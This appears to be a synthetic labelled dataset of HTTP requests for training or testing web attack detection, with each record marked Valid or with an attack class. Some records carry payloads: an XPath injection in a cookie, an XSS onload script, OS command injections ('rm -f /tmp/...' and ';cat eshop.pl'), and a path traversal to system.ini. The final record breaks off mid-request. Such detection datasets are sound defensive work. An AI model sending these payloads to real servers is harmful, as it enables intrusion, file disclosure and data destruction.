X-Serial-Number: 6980972846
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lt2txndh3=561839&V1bodyAnNC=c5r>&jfrti2Ra=t3_Nx9YpC&ajawet=iEvninput &tseeehbteGi=2npdoEle3df&octtsaGU=n@TTEo&tiu3erhasuNro=G2ol9cemetcw&r0laLRstl=230&cJoa1utr=eo8&LMDUgzmevalmfP=aqtLlfesz1enoreh&rOrTtgxe=tsSvobRbhrm9ks&i6=hF7VrM

End - Id: 7995
Start - Id: 563
class: Valid
GET /ujCFV.L4zQ71a_W/nm@_z-e3PGCFlsj/ritaweiYttneio6asTo/a9zzJUcp@8GqtJxWwA/t1rxj-H/tIb.0aa9Mhttpx0ai.mspx?avoetct1btyn=alinputecok31Si5wse&nooxldCnmiypltn=ayetelneta HTTP/1.1
Host: www.R8hz7sies.it
Connection: close
Accept: */*
Accept-Charset: shift_jis;q=0.9, iso-8859-5;q=0.4, x-mac-korean
Accept-Encoding: 
Accept-Language: *
Cache-Control: hlsrep='Uolsen'
Client-ip: 160.201.138.49
Cookie: ieriTsohsani=e6erajoenedmOiW3;srea8aiea=nheSn;aloeee8ar=a2eb8ioNTQhyerXhsg;toLhou=3621825
Cookie2: $Version="404"
Date: Thu, 06 Nov 08 23:44:47 UTC
ETag: W/"ln37JRy0Pdvd44lMwj2"
Expect: 8mlnolre=hrua
From: bss0NyZ@igoc.st
If-Modified-Since: Sat, 20 Dec 08 09:19:06 GMT
If-Unmodified-Since: Thu, 31 May 07 19:46:38 CET
If-Match: *
If-None-Match: "vhuTkefGvi6kq1vhYPDA"
If-Range: Tue, 01 Apr 08 10:05:53 GMT
Max-Forwards: 837
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic N2dtVGFzOjh4cnRw
Authorization: kenish 1iUtmMmu=oslbeact
Range: 5753-
Referer: /35Omz/aciprae/clnj/eaep8/pect.asmx
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: shIcEdoa74lhoz1o
UA-CPU: MIPS
UA-Disp: 4985,6312,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 412x961
Via: 3.0 www.eYede.jpeg, 6.4 www.laonlm.html, 0.5 79.60.131.161
Transfer-Encoding: deflate
Upgrade: 4s9hDc/2.6, irltj/9.0, tsqtnd/0.1
Warning: 107 www.ojbehoq.css "igabo" 
X-Forwarded-For: 248.12.237.242
X-Serial-Number: 602347866565729
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 563
Start - Id: 23714
class: Valid
GET /atnadsec/mqwhRVKtg./ea4rccoe/erA9hhrft/iYExTkMUpFKZ-ZkU/oFpr-XBrc/.uE/tnyocBlA8edeTve2es3/s-6hy4zSn3.gS/8Y/oonrtEGq.tiff?likenwTkU4C.jdelete%u=95393215&idteieea=i0ddvarzeftpscriptse%3Cotsiinat HTTP/1.0
Host: 246.215.122.155:0
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-japanese;q=0.0, x-mac-japanese, utf-8
Accept-Encoding: compress, identity;q=0.5, identity;q=0.4
Accept-Language: 4btel2-bb;q=0.9, TpotTfen-etqyoy;q=0.7, evmq5vr-jm0u, lyhg-limn, ioim2d5r-eT
Cache-Control: no-cache
Client-ip: 26.208.93.197
Cookie: nBnd=6aIhgYPK;Btns8=passthruhheo;qg0QnD=leternnteva;Uarauhtlldsi=eQJE
Cookie2: $Version="51"
Date: Fri, 19 Mar 04 24:38:37 CET
ETag: W/"d0e79NOkONl2-_."
Expect: jl0ss=mdssnhte
From: rteef@dehrxns.com
If-Modified-Since: Sat, 14 Jul 07 05:21:12 CET
If-Unmodified-Since: Sun, 03 Feb 08 20:38:13 CET
If-Match: "MPHlK5@rDQVYawK_"
If-None-Match: *
If-Range: "COPez5GU_9CFwxyh-"
Max-Forwards: 0107
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM YTJ2Y2Vtc29wdGF1bWZlaWRtaGUxZmVvc2RvdHdnYUFpcg==
Authorization: ao9t eeelTTme=35on
Range: 8-90,05-70
Referer: /usnl1bKf/aeqShxi.php4
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/3.6 (X11; U; Open BSD i586 4.2; xl-n7; rv:5.6.8) Gecko/48574241
UA-CPU: PowerPC
UA-Disp: 188,809,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 431x276
Via: HTTP/1.0 www.uilanhkl.jpg, FTP/5.9 www.oahonis.jpeg, FTP/9.4 www.o1oi2tel.gif
Transfer-Encoding: eihw7
Upgrade: ttuos/2.9
Warning: 169 20.110.71.138:174 "Xuulgeai2thhnsm" "Tue, 19 May 09 22:55:23 CET"
X-Forwarded-For: 20.78.164.130
X-Serial-Number: 13224
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23714
Start - Id: 791
class: Valid
GET /jwbiatmovC9zeIG/6Qb-zH1NorbwDcP/iVfYUcFr9MZp/a7jne/jkhd.Hkv/i-E3ZTXH6_Rmq/rBYsqsfRs/hcVtS6MetXXn2Y_6T/8mUu9twXjy.PvdCKeeL/r4ee8tds7Cst8eLrte/iH3hotoN/sLBvj6mT-Q8AIv-.sh?skNe0iFsrmaCtaw=gE2D&apr0r=te+xp_e&oif=8635&aai=%2Frp&access_logNH7_WmazBln=xKeefIAteEis8TCw&gegmhobt=estrcufn8lep&ioelc6=var5on&at1Eeeusr7tht=AesbcvarRa7sih&udwdmAb9rp=haete&Oen2APItf=awa&Ttw=jtmpoLe%2Fhaving%3B4%27+yw+&irnrOeossto=tyv9f&em7e=05416&oEnreoteere2ihC=15919&uElO=8108614272 HTTP/1.0
Host: www.ajracn.org
Connection: keep-alive
Accept: video/*, image/jpeg;q=0.7
Accept-Charset: x-mac-arabic, iso-8859-4, iso-8859-3, iso-8859-7, x-mac-arabic
Accept-Encoding: compress;q=0.2, gzip, identity;q=0.6, compress
Accept-Language: *
Cache-Control: min-fresh=361
Client-ip: 255.154.164.96
Cookie: Dspho=TuerttutriiaR;fCOqrprocessing-instruction=wuZIM
Cookie2: $Version="824"
Date: Wed, 04 Jan 06 21:59:43 GMT
ETag: W/"vmSA-6D5iyFnqPDf"
Expect: oetHs=1eAesvAa;yakds0m=fEe3
From: 9ezDa@yesdpeazkR.de
If-Modified-Since: Sun, 19 Jun 05 19:16:49 CET
If-Unmodified-Since: Sat, 08 Sep 07 13:36:39 CET
If-Match: "q7UKe2-VHdzIEtCg4neC"
If-None-Match: "E.8BlSJ6x2D-G0cV"
If-Range: Fri, 08 Apr 05 16:10:23 GMT
Max-Forwards: 6
MIME-Version: 2.3
Pragma: e='2z'
Proxy-Authorization: NTLM dHRtN29tZWlhZW5xdG90UmlldG44U2FyZWVyYzdueHRhNmFmZHNobEVybG4=
Authorization: i0h8i marAl=seorrrne
Range: -8809,701-32,26-
Referer: http://gsxasn.net/w6Tfa/uhJcyi4/alxre8p/DoiIhll/gaino.conf
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: ehgh (nptX5S; osw_ct3_; pRo064; dSssrER; nXVzRQbQk)
UA-CPU: MIPS
UA-Disp: 2800,8749,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 305x8403
Via: 1.0 209.255.243.223:39198, Y3u/5.2 252.231.17.157:790, 8.8 5.174.214.238
Transfer-Encoding: etoi8; nid4=loulr
Upgrade: zufZE2/7.5, owei/6.5, slroee/5.9
Warning: 303 www.herida.css "typL" "Tue, 07 Mar 06 04:42:54 GMT"
X-Forwarded-For: 183.29.19.247
X-Serial-Number: 40823
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 791
Start - Id: 48410
class: XPathInjection
GET /a9s/zttrtxoiwcjgngrra/nxdu/oYozVgWhv5uwdgJFcOA@/lMK/mq/tiatcieotbeoarN.mdb?2jhe=30&anroonnsi4x=ssystemrpD2pbetweenaaRnnon%3B0q%5B&itr9r=rilwus0rwmjLisr&dtSsethCwmab=01061149&jo4e8omaidee=tnodeg&khewaSsti=423&IOS4SE6PlbCU=6845269 HTTP/1.0
Host: 194.106.99.62:053
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 20.80.25.89
Cookie: ylcfnftd9h=an dh9;e5jmnip=tcya;uefopic=8;6nag96tcgfv6p=y8aabs'    or     1<     i/z/rtohrj/child::text()[position()=327]  or   'nH12we'  ='
Cookie2: $Version="68"
Date: Sat, 21 Nov 09 04:27:08 GMT
ETag: ".Lj17Nox0S6eIS0"
Expect: im4iv=fW1o9
From: sioidlu@ocltctchs.com
If-Modified-Since: Wed, 27 Oct 04 09:28:41 UTC
If-Unmodified-Since: Sat, 01 Jan 05 15:33:41 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5161
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest response="CdEdc9ADFAE4eb4Adb9195AfC0DfF9e6"
Authorization: NTLM OGNvcnZydHNkdVV0cHJpZjZweXQxdGJubjV3bGFydGVieGllZXhhanNlbHQ=
Range: 10-,-037175,0931-3
Referer: /Zetenoy/yortg/lrmces/arsiee.fgf
TE: chunked;q=0.7,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/9.6 (Windows; U; Win98 6.0; Ea-u0; rv:0.6.4) Gecko/88835776
UA-CPU: 68000
UA-Disp: 213,9851,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 0994x095
Via: EoTa/7.8 www.rdol.tiff, 0.7 168.170.171.225:889, 2.7 70.158.66.171
Transfer-Encoding: deflate
Upgrade: 7fwget/5.3
Warning: 304 129.52.86.175 "bsnutzhax5htl" 
X-Forwarded-For: 83.226.88.8
X-Serial-Number: 7032962389
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48410
Start - Id: 33579
class: Valid
PUT /rKLl/hd7lvoemblhpTesas86/iuPxJ/48y6open/6mial/ioaxNist/vynnalrnltlmizhs/dlV/cDZaWRRzM9Q2WyX7a.htm? HTTP/1.0
Content-Length: 209
Content-Language: ssesmIni,srenl6
Content-Encoding: deflate
Content-Location: /coba.swf
Content-MD5: ZWVydHRvVHRkdHR0T2dtUw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 16 Aug 07 02:07:59 UTC
Last-Modified: Sat, 07 Oct 06 17:02:36 CET
Host: 143.46.21.52
Connection: close
Accept: application/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=652
Client-ip: 29.245.147.145
Cookie: trjedcumtvtiwo=tejnUA8E6p2t;nssvdmbmc=e.ziBTaM.;kXXz3u=teY;tgne=\pjhlink
Cookie2: $Version="576"
Date: Thu, 20 Sep 07 08:33:37 CET
ETag: W/"odX2ng6eR3VnkYJX"
Expect: sqej2
From: nOtj@1h5ENHa.biz
If-Modified-Since: Wed, 10 Sep 08 04:08:55 GMT
If-Unmodified-Since: Mon, 03 May 10 02:38:16 UTC
If-Match: "DPuVbWNaKU_5rNZ"
If-None-Match: "U12qfqawl5prfl0iM"
If-Range: *
Max-Forwards: 7511
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM c2JMdGl0MHI3Z2llSGM1dVB5M2d0ZXRzYWloc2tuc2h1dWVNMWFU
Authorization: Basic NUVjMDp5U2Nn
Range: -97,11-
Referer: /holeto9e/sm5snegd.txt
TE: chunked,deflate;q=0.3
Trailer: TE
User-Agent: teuins
UA-CPU: x86
UA-Disp: 4987,665,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 417x756
Via: 6.9 www.33inLs.jpeg
Transfer-Encoding: gzip
Upgrade: ho6uLm/2.2
Warning: 661 www.ngtao.tiff "ezebae8kput" 
X-Forwarded-For: 156.122.130.190
X-Serial-Number: 410317302
----: -------------
~~~~~: ~~~~~~~~~~

hdsrlomhtftA=rUUmMfbkLFt&udAdii8lelh4a=ee&9laeHloEswcu= es\rnKc%&a14god=57046504&bsock_streamhtaccesiBS=?ewtero~oo&)-e&RNkusday=w.R&ennr7sgeDknue=6365301&ohioghcTKdninU=ess21c6&u4Y5dfo9tEubiil=ywSb

End - Id: 33579
Start - Id: 13569
class: Valid
GET /UPD8F0S/8iaiElirmaepL76eozjv/wmox/DWTselectCly/sJDmW/j1@w9UKG.pO/a2tilaHepblQeq/7R4j3eYUp/oC/rw/6tcupntIxps.pl?oeohnosaho=icwTl%3Dddocument9ynN3a&qrjtht=d%269binchildhih%25Ai+eed&ncnAjddr=wzc3nsoiNedrU&izarT9=i&Ioiore=624&UxstdinZZ=3291425920&svbscmaqiow=cNgb&7aatC52syEek59i=620589382&nrnsniee=26009312&boot.iniE5nAS=tioes1ac&EdiSdt=48221 HTTP/1.0
Host: www.brru3gaNeo.de:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.8, gzip;q=0.6
Accept-Language: ri-a3;q=0.9, waspEa-Lt933, sdac1-solluJPu;q=0.4
Cache-Control: sneb='V'
Client-ip: 136.237.9.148
Cookie: rb=rwrdc;deAotIok5EilnTD=;hg/bEtlhRpl;eerMup8=34383735;jtqNht1i=uloiscshomeo<r0t
Cookie2: $Version="66"
Date: Thu, 24 Jan 08 19:33:44 CET
ETag: W/"3.bwp-e_YLj-vLjW"
Expect: 100-continue
From: rctr@uneqdrer.ch
If-Modified-Since: Sat, 24 Jul 04 09:33:28 UTC
If-Unmodified-Since: Sun, 10 Apr 05 11:57:04 UTC
If-Match: *
If-None-Match: *
If-Range: "u1Njo0YWyiq9xEa"
Max-Forwards: 33
MIME-Version: 9.2
Pragma: fz='eaua'
Proxy-Authorization: noxn uaenegsM=zmtlt
Authorization: NTLM dGRjbG16dEowYzc5bDdEaUdUaW5EY25ycmF2NTRhSWg=
Range: -808,133-44
Referer: /wboureeo.asp
TE: deflate,trailers,chunked;q=0.2
Trailer: TE
User-Agent: Mozilla/7.8 (Machintosh; U; PPC 0.9; 7s-se; rv:2.8.0) Gecko/45448017
UA-CPU: Sparc
UA-Disp: 6775,772,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 138x4900
Via: 5.1 140.111.238.51:755, 2.3 222.37.247.41
Transfer-Encoding: hnWm
Upgrade: tihi9l/6.1, hyla/3.9, 4Coi/5.5, tE2c/8.6, strcfX/0.7
Warning: 052 www.giatfee.htm "0Iebnabrrs8lZcrgnoe" 
X-Forwarded-For: 43.218.172.178
X-Serial-Number: 70032554284651
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13569
Start - Id: 9274
class: Valid
GET /7JONkAdocumentvbscriptQGtAMGD/belVr/5Q_eaVXnS8zYdK/autEs6S@utNk2-03/nkB25n/F-E/hmh9eukioh/pdorsoz9q/elh0/rphpy_D/smuRgnlNlei2pHta/izFK@oNDm.asp?asgdnkfah2e=747787928 HTTP/1.1
Host: 91.187.144.119
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 250.172.231.250
Cookie: enSgs=RuosiiframehbnFn)a0d: rps;r6c1=9301640;eytops2rtro=nc0eadmindisn9f;dses=sEenHtfpRhfhtkafbo;7H8PT=reiI)tehH%e
Cookie2: $Version="84"
Date: Sat, 24 Jul 04 14:12:42 UTC
ETag: "w.Mt6Okd.XPkWt4Oq"
Expect: vt4hih9=nniom4e
From: vsdit@a9hosdr9ad.fr
If-Modified-Since: Fri, 01 Apr 05 14:29:12 CET
If-Unmodified-Since: Sun, 11 Nov 07 02:02:38 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 31 Mar 07 06:14:07 CET
Max-Forwards: 0704
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic c2FvdDp0bU55bGt0
Authorization: hjen 4uvssb=istisekh
Range: 39-95,-16552
Referer: http://nsNirtmr.uk/eenl/tahnaE.php3
TE: trailers,gzip
Trailer: Expect
User-Agent: Mozilla/1.3 (compatible; th3mnfap; Windows NT; uymihinn)
UA-CPU: 68000
UA-Disp: 2674,9502,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0125x395
Via: 1.5 186.189.40.228
Transfer-Encoding: aT5sTp
Upgrade: iostth/3.0
Warning: 290 110.110.36.21 "oon7Ni" 
X-Forwarded-For: 215.205.82.248
X-Serial-Number: 378312956268
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9274
Start - Id: 47573
class: XSS
GET /uQ4RrofMHCZzQhZz3/mohhTvo/7kQGqeo/t-WzKdCDSVFGK20/oCQiSaSUee.zf4IgiG1/qaieefNsy7edeotc/easoeoa0hmd.htm?hHtItn=1d&hgi9e51l9I=wL7++onload%3Djavascript%3A+alert%283aRhtkle.Aeerse9d%29&MjRlike=mda%5Dsv8tmnozso%3F HTTP/1.1
Host: www.nptdz.fr
Connection: abo8ea
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 118.106.166.150
Cookie: eahotlmit=auo1tej;jal2et=s s  ;veinpafeothoe38=z2AnFUAM;wdn4=ehCgVNz;ZSRqIXO=i tspeYh+
Cookie2: $Version="36"
Date: Mon, 26 Jan 09 16:24:32 UTC
ETag: "jT6yUuV.swlQFpy"
Expect: 100-continue
From: we7o1cGs@2OwoTmtOk.com
If-Modified-Since: Fri, 08 Jan 10 20:50:19 GMT
If-Unmodified-Since: Fri, 16 Jan 09 14:14:54 GMT
If-Match: "MT_hlNFibHJQceJx"
If-None-Match: *
If-Range: Mon, 08 Aug 05 05:51:09 UTC
Max-Forwards: 50
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic dHJ4ZTg4OmlvRnM=
Authorization: Basic Y08xaTpsd1R1bg==
Range: 7-,-18566
Referer: http://ptoe4a.gov/utaaasin/loqsr/tUEhldut/ndngoa.zip
TE: chunked,gzip
Trailer: If-Match
User-Agent: erin9dtceehmtyjhsmvg
UA-CPU: x86
UA-Disp: 2757,1725,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 924x017
Via: 1.4 92.92.183.163, 1.8 www.en2beie.htm, 9.0 www.hmlicNeo.html
Transfer-Encoding: deflate
Upgrade: eTere/4.3, ulLei/2.8
Warning: 084 236.106.31.192:22 "edNteueotaOrbpOeua" "Thu, 03 Jun 04 03:45:24 GMT"
X-Forwarded-For: 113.69.67.238
X-Serial-Number: 2524902769036083814
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47573
Start - Id: 18082
class: Valid
GET /oyhcDdllne/JMC@OKD8RsselectzeKt/7Nuv35/e9cppmRaasmhcmwrsi9/nA41K03iYa_l/oiAaltw7se/ehzoe8dwwurn3aosbfn/iadaxinshroioc/h9.q6SSpiOKu1K.gif?ent4n=sevsgassaionn HTTP/1.0
Host: www.xmnsaE5.de
Connection: m1psjsmw
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: onj-ihu, t-bltl9dq;q=0.9, i-etlneC;q=0.4, 2wVa8mc-hsyskeui, o-Tsrpoe;q=0.1
Cache-Control: suteey='h'
Client-ip: 211.175.152.169
Cookie: eeihadmEnAi=laapeint;bpaasyerbzdt1bs=725;iis= T7 n
Cookie2: $Version="5"
Date: Thu, 27 Sep 07 11:13:33 CET
ETag: W/"eHmW0mNcEda-3Z5u"
Expect: emN8m
From: as4ao3rt@lnnha.gov
If-Modified-Since: Fri, 05 Jan 07 02:25:10 UTC
If-Unmodified-Since: Fri, 02 Jun 06 14:58:33 CET
If-Match: "DNQJMTMDoZX7ou5rc"
If-None-Match: *
If-Range: Sun, 20 Mar 05 11:57:33 UTC
Max-Forwards: 5
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic YWhnZGE6bmlpN1R0
Authorization: NTLM NG9taW9vdGh0bDF0eXRjb3hJc21hVGVkbW9scnR2ZDVoVGVIYWY=
Range: 05487-,314421-,-1481
Referer: /ooyceIs.mspx
TE: trailers
Trailer: Cache-Control
User-Agent: 3egeUoib
UA-CPU: MIPS
UA-Disp: 2004,7271,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1961x6711
Via: 9.2 www.o51af.htm, 9.3 www.ytresudd.html, HTTP/4.1 www.iruRtd.jpg
Transfer-Encoding: identity
Upgrade: oOEYTn/3.8, eeeam0/1.2, lteo/1.6, p7i/2.9, dxte3i/3.0
Warning: 504 www.jecaa.jpg "whtdsrErtaeai" "Sun, 11 Sep 05 02:40:23 GMT"
X-Forwarded-For: 31.128.239.22
X-Serial-Number: 7309979
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 18082
Start - Id: 36757
class: OsCommanding
GET /ngtmemmioero/tsRtyuRl8eytVnsap/cBXP_/l2Dt9J2Rijru@qcbS/ugroup bytYD0Popt/UUJOMf.shtml?GKxRIugQz=rm++++-f+%2Ftmp%2Fe1TI++%7C HTTP/1.1
Host: www.7eno8ia4.fr
Connection: 0nat
Accept: application/postscript;q=0.8, video/quicktime
Accept-Charset: x-mac-hebrew;q=0.7, windows-874;q=0.4, euc-kr;q=0.5, iso-8859-5;q=0.0, x-mac-korean;q=0.0
Accept-Encoding: *
Accept-Language: vynhmg5-ieegt;q=0.4, e-xxaw;q=0.7, 8Z0srx-e5seupn, leu-yexa
Cache-Control: min-fresh=1410
Client-ip: 130.81.190.203
Cookie: QPCSXmb25=t=aW;dtmoe=37CqSshutdownoyxo4m;qn=113926033
Cookie2: $Version="576"
Date: Wed, 31 May 06 08:46:43 CET
ETag: W/"nq-5AohjOXHMiQfI"
Expect: 100-continue
From: 1Ruwies@Rllsdtnt.st
If-Modified-Since: Wed, 19 May 04 04:29:15 UTC
If-Unmodified-Since: Sun, 03 Aug 08 14:20:54 UTC
If-Match: "AcodqUqxsT1b9Y33"
If-None-Match: "HfjEhsKvvX7hEI24"
If-Range: "XISmt7q2iLSY2FHm"
Max-Forwards: 3
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest response="49a2dbb09A077a8FDd2baA76dAA5E5dd"
Authorization: NTLM Z09pYm5pYmV0bHdlc2xreWlwZnJlbnJobmVFc2R5czZ0ZmFvMGV0cGtneA==
Range: 8-,6-50
Referer: /tse9gn/bEig.exe
TE: deflate,trailers,gzip;q=0.4
Trailer: Cache-Control
User-Agent: urttii (n-I75Uwb; iPd9J8RIDb)
UA-CPU: x86
UA-Disp: 944,674,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 232x1783
Via: 6.1 215.249.75.54
Transfer-Encoding: gzip
Upgrade: ozdet9/9.7, Rir/6.3, t2nuis/3.2, OrehaH/2.4
Warning: 508 www.fetrah.tiff "t7sycuhIpesS" "Wed, 10 Feb 10 05:46:21 GMT"
X-Forwarded-For: 128.194.144.121
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36757
Start - Id: 26675
class: Valid
GET /edtsh2t/ieeti.asp?tftaMd40jel7nm=bH8uLG&6wQu-snodeH.=iowec7eegeort&engo=b0cEh%5Cwiga&ekT=ac2ZvWs&teeTSin=deNf&25httbi=0ha HTTP/1.1
Host: 70.68.205.127
Connection: close
Accept: text/*;q=0.2, audio/basic
Accept-Charset: macintosh, isiri-3342;q=0.9
Accept-Encoding: 
Accept-Language: in-gnaufc1;q=0.4, aesr4h-to, mtiab-rad, eai-ATnn;q=0.1, Ca-nrDueo;q=0.9
Cache-Control: only-if-cached
Client-ip: 197.217.166.9
Cookie: harmf2hsaofNf=ap6fWd7oD;mtqsu76gEane=scripttM$;Tt=i35CD_;eE9bgusoR=sas(d
Cookie2: $Version="3"
Date: Fri, 04 Sep 09 24:23:27 CET
ETag: "OXEwyJ.-XWo@BVK"
Expect: l9B7meo=9eethcj
From: aenrotes@hoereselr.be
If-Modified-Since: Mon, 27 Jul 09 01:19:49 GMT
If-Unmodified-Since: Sat, 09 May 09 03:11:35 GMT
If-Match: *
If-None-Match: "i80nTMsuAxDy9KG"
If-Range: Mon, 23 Jan 06 17:06:00 CET
Max-Forwards: 321
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest response="24ebD5f3BCcCec4f689DAfd20DcADAf6"
Authorization: Digest nc=b5bCEC9d
Range: -931372,028-677
Referer: http://www.iTlcseu.uk/arma/1vz0s/hrenceh/ddox.html
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/1.4 (X11; U; SunOS sun4u 3.9; Sf-ch; rv:4.4.9) Gecko/53740139
UA-CPU: PowerPC
UA-Disp: 0736,120,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 190x433
Via: 3.1 www.0tyRhhn.jpg, 6.8 192.93.43.233:29
Transfer-Encoding: deflate
Upgrade: ottfS/3.5, uako/7.9, ttm/6.7, eol/3.3
Warning: 647 www.73orh.js "6zehdei0repaoct" "Sun, 20 Nov 05 12:22:26 GMT"
X-Forwarded-For: 116.189.185.38
X-Serial-Number: 5910196051122866
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26675
Start - Id: 12605
class: Valid
GET /ss/wfhose/e_NSwC/htTofqrDFO.css?includefNKYhavingT=iumtjhetI HTTP/1.0
Host: www.bath.uk
Connection: keep-alive
Accept: video/mpeg;q=0.5, text/*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.6, gzip;q=0.7, deflate, identity;q=0.0, compress;q=0.8
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 139.134.8.81
Cookie: nnvsnt=eXky2uDQ@;ui9othwa1oe8wIO=5giwrmIulo;cgtsnz7=Oirul;1dTesryP=vti;vdsden2da=rCOsM
Cookie2: $Version="5"
Date: Sun, 08 Nov 09 18:58:36 GMT
ETag: W/"9SrFI8sv-rgno9shy6z"
Expect: aticmne0
From: twlt2b@loijwag.it
If-Modified-Since: Tue, 17 Oct 06 06:13:14 GMT
If-Unmodified-Since: Mon, 15 May 06 08:10:02 UTC
If-Match: "BU41Lz8Tm0G7CRcE38"
If-None-Match: *
If-Range: Sat, 12 Nov 05 02:41:42 GMT
Max-Forwards: 206
MIME-Version: 1.8
Pragma: n5sA=lnFtawoe
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=MD5
Range: 6-190
Referer: http://www.8ae8.st/onhsB/Dshirn2e.jsp
TE: trailers,chunked;q=0.8
Trailer: If-Match
User-Agent: etnlqtSau (alYN7M2; eN5qmNx; 7RDE0g6bMI)
UA-CPU: x86
UA-Disp: 3446,218,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 280x609
Via: FTP/5.0 www.etogis.html:42717, HTTP/5.2 www.vteqahio.shtml, FTP/0.7 249.213.253.186
Transfer-Encoding: deflate
Upgrade: 3n9/9.5, ido/8.7, mo5iss/2.2
Warning: 763 www.z7ul.css "tssrit" "Wed, 27 Feb 08 20:20:42 CET"
X-Forwarded-For: 75.184.77.165
X-Serial-Number: 3726535305604
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12605
Start - Id: 45329
class: PathTransversal
GET /o@5hNfbgCgl/_50-5fFYLsami@/c3positionncr2B/eFzf/leseAjarhfyRiciirnA/tntHej3eonmshn3am/3fZhILQKE5IE/oS6ItJdG1q7WJMHIF.4@/4vLB-tmpBPS/DeOUJ.htm?irH8Qa=se HTTP/1.1
Host: 118.56.119.235
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-4;q=0.6, x-mac-greek, ks_c_5601-1987;q=0.9, x-mac-greek;q=0.7, x-mac-roman
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 107.243.204.240
Cookie: twp-_WQB=csam;bewhsan=22;ri=..\..\..\..\..\..\WINDOWS\system.ini;zwim=FRviEraihttstcnlgG;eyV1M=eaiuteu;akokh=605
Cookie2: $Version="13"
Date: Mon, 29 Oct 07 17:20:53 UTC
ETag: W/"Y6zgKIUkHVPA06Fw@"
Expect: 100-continue
If-Modified-Since: Fri, 14 Nov 08 20:32:19 GMT
If-Unmodified-Since: Wed, 21 Jun 06 09:13:12 GMT
If-Match: "TMey3co9ibq_1Kj5G"
If-None-Match: *
If-Range: "mdFeEAx_bheLSRhtv"
Max-Forwards: 709
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Digest response="ed8dfEc306DDbBD0ba58b281AD1168bF"
Authorization: NTLM Z0x1aXRzZWFsbnFpbm8xZHQ3em5zU2VpOW9sZFZpb1R6bmF0TnQ3bGk=
Referer: /kjYEd.dll
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.1 (Machintosh; U; PPC Mac OS X 9.6; 5a-sz; rv:9.2.3) Gecko/28636986
UA-Disp: 313,563,8
UA-Color: color32
Via: 6.3 www.8iUaa.html
Transfer-Encoding: compress
X-Forwarded-For: 86.225.57.136
X-Serial-Number: 341978779570501

null

End - Id: 45329
Start - Id: 44543
class: OsCommanding
GET /bin/aE1eDNn.pl/seite=;cat eshop.pl|? HTTP/1.0
Host: www.enZwcoojte.fr
Connection: t0esa
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: Eie7dMm-dyu
Cache-Control: no-store
Client-ip: 15.83.253.70
Cookie: a2wbk4cn=ii2nle5yoevlb;-8wfE9Dk=nst
